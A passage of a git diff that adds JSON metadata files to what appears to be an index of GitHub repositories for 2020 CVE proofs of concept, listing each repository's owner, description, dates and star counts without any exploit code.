"https:\/\/github.com\/lizhianyuguangming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lizhianyuguangming\/TomcatScanPro", + "description": "tomcat自动化漏洞扫描利用工具,支持批量弱口令检测、后台部署war包getshell、CVE-2017-12615 文件上传、CVE-2020-1938\/CNVD-2020-10487 文件包含", + "fork": false, + "created_at": "2024-08-29T06:38:16Z", + "updated_at": "2024-11-28T12:25:23Z", + "pushed_at": "2024-11-13T03:12:58Z", + "stargazers_count": 151, + "watchers_count": 151, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "hacker", + "hackertools", + "penetration-testing-tools", + "scan", + "scanner-web", + "tomcat", + "tools" + ], + "visibility": "public", + "forks": 14, + "watchers": 151, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 892828226, + "name": "poc-CVE-2020-1938", + "full_name": "aib0litt\/poc-CVE-2020-1938", + "owner": { + "login": "aib0litt", + "id": 188634799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188634799?v=4", + "html_url": "https:\/\/github.com\/aib0litt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aib0litt\/poc-CVE-2020-1938", + "description": "poc-CVE-2020-1938", + "fork": false, + "created_at": "2024-11-22T21:24:22Z", + "updated_at": "2024-11-22T21:28:54Z", + "pushed_at": "2024-11-22T21:28:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1947.json b/2020/CVE-2020-1947.json new file mode 100644 index 0000000000..313a747a78 --- /dev/null +++ b/2020/CVE-2020-1947.json @@ -0,0 +1,126 @@ +[ + { + "id": 246463480, + "name": "CVE-2020-1947", + "full_name": "jas502n\/CVE-2020-1947", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2020-1947", + "description": "Apache ShardingSphere UI YAML解析远程代码执行漏洞", + "fork": false, + "created_at": "2020-03-11T03:15:25Z", + "updated_at": "2024-08-12T19:58:36Z", + "pushed_at": "2020-03-11T03:54:34Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 246566519, + "name": "CVE-2020-1947", + "full_name": "wsfengfan\/CVE-2020-1947", + "owner": { + "login": "wsfengfan", + "id": 33821840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33821840?v=4", + "html_url": "https:\/\/github.com\/wsfengfan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wsfengfan\/CVE-2020-1947", + "description": "CVE-2020-1947 Python POC", + "fork": false, + "created_at": "2020-03-11T12:35:56Z", + "updated_at": "2024-08-12T19:58:37Z", + "pushed_at": "2020-03-11T15:06:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 247037641, + "name": "ShardingSphere_CVE-2020-1947", + "full_name": "shadowsock5\/ShardingSphere_CVE-2020-1947", + "owner": { + "login": "shadowsock5", + "id": 30398606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30398606?v=4", + "html_url": "https:\/\/github.com\/shadowsock5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shadowsock5\/ShardingSphere_CVE-2020-1947", + "description": null, + "fork": false, + "created_at": "2020-03-13T09:47:33Z", + "updated_at": "2024-08-12T19:58:45Z", + "pushed_at": "2020-03-13T09:49:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 267802055, + "name": "CVE-2020-1947", + "full_name": "StarkChristmas\/CVE-2020-1947", + "owner": { + "login": "StarkChristmas", + "id": 32755890, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32755890?v=4", + "html_url": "https:\/\/github.com\/StarkChristmas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StarkChristmas\/CVE-2020-1947", + "description": null, + "fork": false, + "created_at": "2020-05-29T08:07:16Z", + "updated_at": "2020-09-23T09:58:49Z", + "pushed_at": "2020-05-29T09:33:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1948.json b/2020/CVE-2020-1948.json new file mode 100644 index 0000000000..62d3e3544d --- /dev/null +++ b/2020/CVE-2020-1948.json @@ -0,0 +1,126 @@ +[ + { + "id": 275351795, + "name": "CVE-2020-1948", + "full_name": "ctlyz123\/CVE-2020-1948", + "owner": { + "login": "ctlyz123", + "id": 50359597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50359597?v=4", + "html_url": "https:\/\/github.com\/ctlyz123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ctlyz123\/CVE-2020-1948", + "description": null, + "fork": false, + "created_at": "2020-06-27T10:47:22Z", + "updated_at": "2022-07-02T08:19:06Z", + "pushed_at": "2020-06-27T10:48:20Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 277021315, + "name": "Dubbo-CVE-2020-1948", + "full_name": "txrw\/Dubbo-CVE-2020-1948", + "owner": { + "login": "txrw", + "id": 32354358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32354358?v=4", + "html_url": "https:\/\/github.com\/txrw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/txrw\/Dubbo-CVE-2020-1948", + "description": "Apache Dubbo CVE-2020-1948 漏洞测试环境,亲测可用。", + "fork": false, + "created_at": "2020-07-04T02:06:28Z", + "updated_at": "2023-09-05T08:17:27Z", + "pushed_at": "2020-07-03T02:46:53Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 278242568, + "name": "cve-2020-1948-poc", + "full_name": "M3g4Byt3\/cve-2020-1948-poc", + "owner": { + "login": "M3g4Byt3", + "id": 25048908, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25048908?v=4", + "html_url": "https:\/\/github.com\/M3g4Byt3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M3g4Byt3\/cve-2020-1948-poc", + "description": null, + "fork": false, + "created_at": "2020-07-09T02:27:54Z", + "updated_at": "2022-10-01T19:10:26Z", + "pushed_at": "2020-07-02T10:03:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 279463521, + "name": "Dubbo-deserialization", + "full_name": "L0kiii\/Dubbo-deserialization", + "owner": { + "login": "L0kiii", + "id": 49805006, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49805006?v=4", + "html_url": "https:\/\/github.com\/L0kiii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L0kiii\/Dubbo-deserialization", + "description": "[CVE-2020-1948] Apache Dubbo Provider default deserialization cause RCE", + "fork": false, + "created_at": "2020-07-14T02:42:41Z", + "updated_at": "2023-05-30T07:37:52Z", + "pushed_at": "2022-12-16T04:21:16Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1956.json b/2020/CVE-2020-1956.json new file mode 100644 index 0000000000..b9624d6d98 --- /dev/null +++ b/2020/CVE-2020-1956.json @@ -0,0 +1,33 @@ +[ + { + "id": 383961985, + "name": "CVE-2020-1956", + "full_name": "b510\/CVE-2020-1956", + "owner": { + "login": "b510", + "id": 47598258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47598258?v=4", + "html_url": "https:\/\/github.com\/b510", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b510\/CVE-2020-1956", + "description": "CVE-2020-1956", + "fork": false, + "created_at": "2021-07-08T00:58:07Z", + "updated_at": "2021-07-09T01:48:32Z", + "pushed_at": "2021-07-09T01:48:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1958.json b/2020/CVE-2020-1958.json new file mode 100644 index 0000000000..9eb8950cf1 --- /dev/null +++ b/2020/CVE-2020-1958.json @@ -0,0 +1,33 @@ +[ + { + "id": 254874176, + "name": "CVE-2020-1958", + "full_name": "ggolawski\/CVE-2020-1958", + "owner": { + "login": "ggolawski", + "id": 35563296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35563296?v=4", + "html_url": "https:\/\/github.com\/ggolawski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggolawski\/CVE-2020-1958", + "description": "CVE-2020-1958 PoC", + "fork": false, + "created_at": "2020-04-11T13:31:02Z", + "updated_at": "2024-08-12T20:00:01Z", + "pushed_at": "2020-04-11T14:52:36Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-19586.json b/2020/CVE-2020-19586.json new file mode 100644 index 0000000000..39206bed5d --- /dev/null +++ b/2020/CVE-2020-19586.json @@ -0,0 +1,33 @@ +[ + { + "id": 530596542, + "name": "CVE-2020-19586", + "full_name": "Deepak983\/CVE-2020-19586", + "owner": { + "login": "Deepak983", + "id": 51229959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51229959?v=4", + "html_url": "https:\/\/github.com\/Deepak983", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Deepak983\/CVE-2020-19586", + "description": "Incorrect Access Control issue in Yellowfin Business Intelligence 7.3 allows remote attackers to escalate privilege via MIAdminStyles.i4 Admin UI", + "fork": false, + "created_at": "2022-08-30T10:00:01Z", + "updated_at": "2022-08-30T10:00:01Z", + "pushed_at": "2022-08-30T10:15:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-19587.json b/2020/CVE-2020-19587.json new file mode 100644 index 0000000000..16b4f81231 --- /dev/null +++ b/2020/CVE-2020-19587.json @@ -0,0 +1,33 @@ +[ + { + "id": 530599295, + "name": "CVE-2020-19587", + "full_name": "Deepak983\/CVE-2020-19587", + "owner": { + "login": "Deepak983", + "id": 51229959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51229959?v=4", + "html_url": "https:\/\/github.com\/Deepak983", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Deepak983\/CVE-2020-19587", + "description": null, + "fork": false, + "created_at": "2022-08-30T10:08:07Z", + "updated_at": "2022-08-30T10:08:07Z", + "pushed_at": "2022-08-30T10:09:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1967.json b/2020/CVE-2020-1967.json new file mode 100644 index 0000000000..9a493f1f93 --- /dev/null +++ b/2020/CVE-2020-1967.json @@ -0,0 +1,33 @@ +[ + { + "id": 259753033, + "name": "CVE-2020-1967", + "full_name": "irsl\/CVE-2020-1967", + "owner": { + "login": "irsl", + "id": 6357121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6357121?v=4", + "html_url": "https:\/\/github.com\/irsl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irsl\/CVE-2020-1967", + "description": "Proof of concept exploit about OpenSSL signature_algorithms_cert DoS flaw (CVE-2020-1967)", + "fork": false, + "created_at": "2020-04-28T21:15:35Z", + "updated_at": "2024-08-12T20:00:51Z", + "pushed_at": "2024-06-16T07:26:03Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 19, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1971.json b/2020/CVE-2020-1971.json new file mode 100644 index 0000000000..21338a49e3 --- /dev/null +++ b/2020/CVE-2020-1971.json @@ -0,0 +1,40 @@ +[ + { + "id": 320084650, + "name": "CVE-2020-1971", + "full_name": "MBHudson\/CVE-2020-1971", + "owner": { + "login": "MBHudson", + "id": 59308634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59308634?v=4", + "html_url": "https:\/\/github.com\/MBHudson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MBHudson\/CVE-2020-1971", + "description": "CVE-2020-1971 Auto Scan & Remote Exploit Script. Auto Local Scan & Patch Script.", + "fork": false, + "created_at": "2020-12-09T21:32:15Z", + "updated_at": "2023-03-10T12:07:53Z", + "pushed_at": "2020-12-10T02:27:02Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-1971", + "exploit", + "fix", + "hack", + "opensll", + "patch" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-20093.json b/2020/CVE-2020-20093.json new file mode 100644 index 0000000000..2f4de21795 --- /dev/null +++ b/2020/CVE-2020-20093.json @@ -0,0 +1,33 @@ +[ + { + "id": 202591207, + "name": "RIUS", + "full_name": "zadewg\/RIUS", + "owner": { + "login": "zadewg", + "id": 38017709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38017709?v=4", + "html_url": "https:\/\/github.com\/zadewg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zadewg\/RIUS", + "description": "CVE-2020-20093; 20094; 20095; 20096, 2022-28345 RTLO Injection URI Spoofing ", + "fork": false, + "created_at": "2019-08-15T18:22:18Z", + "updated_at": "2024-09-09T14:59:23Z", + "pushed_at": "2023-10-31T02:37:26Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 88, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2023.json b/2020/CVE-2020-2023.json new file mode 100644 index 0000000000..1fef4fe59f --- /dev/null +++ b/2020/CVE-2020-2023.json @@ -0,0 +1,33 @@ +[ + { + "id": 637610342, + "name": "kata-cve-2020-2023-poc", + "full_name": "ssst0n3\/kata-cve-2020-2023-poc", + "owner": { + "login": "ssst0n3", + "id": 16935049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16935049?v=4", + "html_url": "https:\/\/github.com\/ssst0n3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ssst0n3\/kata-cve-2020-2023-poc", + "description": null, + "fork": false, + "created_at": "2023-05-08T03:12:46Z", + "updated_at": "2023-05-09T11:13:24Z", + "pushed_at": "2023-05-24T08:10:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2034.json b/2020/CVE-2020-2034.json new file mode 100644 index 0000000000..3932ab060d --- /dev/null +++ b/2020/CVE-2020-2034.json @@ -0,0 +1,33 @@ +[ + { + "id": 286057021, + "name": "CVE-2020-2034-POC", + "full_name": "blackhatethicalhacking\/CVE-2020-2034-POC", + "owner": { + "login": "blackhatethicalhacking", + "id": 13942386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13942386?v=4", + "html_url": "https:\/\/github.com\/blackhatethicalhacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blackhatethicalhacking\/CVE-2020-2034-POC", + "description": "Determine the Version Running on the Palo Alto Network Firewall for the Global Protect Portal", + "fork": false, + "created_at": "2020-08-08T14:19:44Z", + "updated_at": "2024-08-12T20:04:32Z", + "pushed_at": "2020-08-14T09:24:34Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2038.json b/2020/CVE-2020-2038.json new file mode 100644 index 0000000000..84a927091e --- /dev/null +++ b/2020/CVE-2020-2038.json @@ -0,0 +1,33 @@ +[ + { + "id": 520971066, + "name": "CVE-2020-2038", + "full_name": "und3sc0n0c1d0\/CVE-2020-2038", + "owner": { + "login": "und3sc0n0c1d0", + "id": 32236059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4", + "html_url": "https:\/\/github.com\/und3sc0n0c1d0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/CVE-2020-2038", + "description": "Exploit to capitalize on vulnerability CVE-2020-2038.", + "fork": false, + "created_at": "2022-08-03T17:21:51Z", + "updated_at": "2024-09-19T02:32:33Z", + "pushed_at": "2022-08-03T17:57:53Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-21378.json b/2020/CVE-2020-21378.json new file mode 100644 index 0000000000..f3c03a661d --- /dev/null +++ b/2020/CVE-2020-21378.json @@ -0,0 +1,33 @@ +[ + { + "id": 447941021, + "name": "SeaCMS-v10.1", + "full_name": "sukusec301\/SeaCMS-v10.1", + "owner": { + "login": "sukusec301", + "id": 91454678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91454678?v=4", + "html_url": "https:\/\/github.com\/sukusec301", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sukusec301\/SeaCMS-v10.1", + "description": "For code auit and CVE-2020-21378 repetition. Have fun with it!", + "fork": false, + "created_at": "2022-01-14T11:17:26Z", + "updated_at": "2022-01-20T14:46:24Z", + "pushed_at": "2022-01-14T11:25:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23160.json b/2020/CVE-2020-23160.json new file mode 100644 index 0000000000..d23db242d5 --- /dev/null +++ b/2020/CVE-2020-23160.json @@ -0,0 +1,33 @@ +[ + { + "id": 332770347, + "name": "Pyrescom-Termod-PoC", + "full_name": "Outpost24\/Pyrescom-Termod-PoC", + "owner": { + "login": "Outpost24", + "id": 66684718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66684718?v=4", + "html_url": "https:\/\/github.com\/Outpost24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Outpost24\/Pyrescom-Termod-PoC", + "description": "Pyrescom Termod proof-of-concept code for CVE-2020-23160, CVE-2020-23161 and CVE-2020-23162", + "fork": false, + "created_at": "2021-01-25T14:17:35Z", + "updated_at": "2021-02-02T09:20:33Z", + "pushed_at": "2021-02-02T09:15:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2333.json b/2020/CVE-2020-2333.json new file mode 100644 index 0000000000..ebd579fa61 --- /dev/null +++ b/2020/CVE-2020-2333.json @@ -0,0 +1,33 @@ +[ + { + "id": 257913855, + "name": "CVE-2020-2333", + "full_name": "section-c\/CVE-2020-2333", + "owner": { + "login": "section-c", + "id": 19670854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19670854?v=4", + "html_url": "https:\/\/github.com\/section-c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/section-c\/CVE-2020-2333", + "description": null, + "fork": false, + "created_at": "2020-04-22T13:44:30Z", + "updated_at": "2020-04-22T13:44:30Z", + "pushed_at": "2020-04-22T13:44:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23342.json b/2020/CVE-2020-23342.json new file mode 100644 index 0000000000..ad940fdebb --- /dev/null +++ b/2020/CVE-2020-23342.json @@ -0,0 +1,33 @@ +[ + { + "id": 363561516, + "name": "CVE-2020-23342", + "full_name": "DXY0411\/CVE-2020-23342", + "owner": { + "login": "DXY0411", + "id": 42259364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42259364?v=4", + "html_url": "https:\/\/github.com\/DXY0411", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DXY0411\/CVE-2020-23342", + "description": null, + "fork": false, + "created_at": "2021-05-02T03:57:32Z", + "updated_at": "2021-05-02T04:01:38Z", + "pushed_at": "2021-05-02T04:01:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23489.json b/2020/CVE-2020-23489.json new file mode 100644 index 0000000000..665236f5d5 --- /dev/null +++ b/2020/CVE-2020-23489.json @@ -0,0 +1,33 @@ +[ + { + "id": 276953836, + "name": "AVideo3xploit", + "full_name": "ahussam\/AVideo3xploit", + "owner": { + "login": "ahussam", + "id": 6137238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6137238?v=4", + "html_url": "https:\/\/github.com\/ahussam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahussam\/AVideo3xploit", + "description": "RCE exploit for AVideo < 8.9 (CVE-2020-23489 & CVE-2020-23490)", + "fork": false, + "created_at": "2020-07-03T17:27:12Z", + "updated_at": "2021-09-01T08:21:05Z", + "pushed_at": "2021-09-01T08:21:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23582.json b/2020/CVE-2020-23582.json new file mode 100644 index 0000000000..75bdcc6356 --- /dev/null +++ b/2020/CVE-2020-23582.json @@ -0,0 +1,33 @@ +[ + { + "id": 568473088, + "name": "CVE-2020-23582", + "full_name": "huzaifahussain98\/CVE-2020-23582", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23582", + "description": "OPTILINK E-PON \"MODEL NO: OP-XT71000N\" with \"HARDWARE VERSION: V2.2\"; & \"FIRMWARE VERSION: OP_V3.3.1-191028\"", + "fork": false, + "created_at": "2022-11-20T16:37:09Z", + "updated_at": "2022-11-20T16:57:35Z", + "pushed_at": "2022-11-20T16:50:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23583.json b/2020/CVE-2020-23583.json new file mode 100644 index 0000000000..3f91178cd0 --- /dev/null +++ b/2020/CVE-2020-23583.json @@ -0,0 +1,33 @@ +[ + { + "id": 568480048, + "name": "CVE-2020-23583", + "full_name": "huzaifahussain98\/CVE-2020-23583", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23583", + "description": "REMOTE CODE EXECUTION found in \"OPTILINK OP-XT71000N\".", + "fork": false, + "created_at": "2022-11-20T17:02:19Z", + "updated_at": "2022-11-20T17:02:19Z", + "pushed_at": "2022-11-20T17:07:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23584.json b/2020/CVE-2020-23584.json new file mode 100644 index 0000000000..0d19504b77 --- /dev/null +++ b/2020/CVE-2020-23584.json @@ -0,0 +1,33 @@ +[ + { + "id": 568484303, + "name": "CVE-2020-23584", + "full_name": "huzaifahussain98\/CVE-2020-23584", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23584", + "description": "REMOTE CODE EXECUTION", + "fork": false, + "created_at": "2022-11-20T17:17:37Z", + "updated_at": "2022-11-20T17:22:38Z", + "pushed_at": "2022-11-20T17:30:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23585.json b/2020/CVE-2020-23585.json new file mode 100644 index 0000000000..c3e39bcf82 --- /dev/null +++ b/2020/CVE-2020-23585.json @@ -0,0 +1,33 @@ +[ + { + "id": 568487016, + "name": "CVE-2020-23585", + "full_name": "huzaifahussain98\/CVE-2020-23585", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23585", + "description": "cross-site request forgery (CSRF) attack on \"OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028\".", + "fork": false, + "created_at": "2022-11-20T17:27:09Z", + "updated_at": "2022-11-20T17:27:09Z", + "pushed_at": "2022-11-20T17:34:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23586.json 